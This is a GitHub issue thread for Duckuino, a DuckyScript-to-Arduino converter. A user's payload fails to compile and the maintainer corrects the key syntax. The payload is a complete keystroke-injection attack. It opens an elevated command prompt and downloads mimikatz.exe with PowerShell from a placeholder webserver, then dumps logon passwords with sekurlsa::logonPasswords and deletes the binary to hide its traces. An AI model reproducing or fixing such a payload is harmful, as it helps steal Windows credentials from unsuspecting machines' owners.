Dukweeno / Duckuino

Simple DuckyScript to Arduino C converter.
https://dukweeno.github.io/Duckuino/
MIT License
353 stars 117 forks source link

ctrl - shift enter ?? #72

Closed Virtuoso8 closed 6 years ago

Virtuoso8 commented 6 years ago

Hi there, I tried converting a duckyscript to an arduino code but says line 7 has a problem? AND I AM COMPLETELY NEW TO ALL OF THIS SO I APOLOGISE IF THIS IS A STUPID QUESTION

Input code: REM mimikatz ducky script to dump local wdigest passwords from memory using mimikatz (local user needs to be an administrator/have admin privs) DELAY 3000 CONTROL ESCAPE DELAY 1000 STRING cmd DELAY 1000 CTRL-SHIFT ENTER DELAY 1000 ALT y DELAY 300 ENTER STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<replace me with webserver ip/host>/mimikatz.exe','%TEMP%\mimikatz.exe') DELAY 300 ENTER DELAY 3000 STRING %TEMP%\mimikatz.exe DELAY 300 ENTER DELAY 3000 STRING privilege::debug DELAY 300 ENTER DELAY 1000 STRING sekurlsa::logonPasswords full DELAY 300 ENTER DELAY 1000 STRING exit DELAY 300 ENTER DELAY 100 STRING del %TEMP%\mimikatz.exe DELAY 300 ENTER

Output code: An error occured, the compiler returned undefined content !

Error: Unknown command or key CTRL-SHIT at line: 7.

Cheers in advance

lowlevl commented 6 years ago

Hello, from the DuckyScript documentation, the key words are CONTROL SHIFT instead of CONTROL-SHIFT. So yeah, that's a problem on line 7 ^^

Virtuoso8 commented 6 years ago

Hahah cheers man i figured that 2 minutes after i posted it.

On 7 July 2018 at 07:59, Nurrl notifications@github.com wrote:

Hello, from the DuckyScript documentation, the key words are CONTROL SHIFT instead of CONTROL-SHIFT. So yeah, that's a problem on line 7 ^^

— You are receiving this because you authored the thread. Reply to this email directly, view it on GitHub https://github.com/Nurrl/Duckuino/issues/72#issuecomment-403157065, or mute the thread https://github.com/notifications/unsubscribe-auth/Am_m9aL6hpHh3zKMFlMENmR-6TeQoSKFks5uD93SgaJpZM4VFN8_ .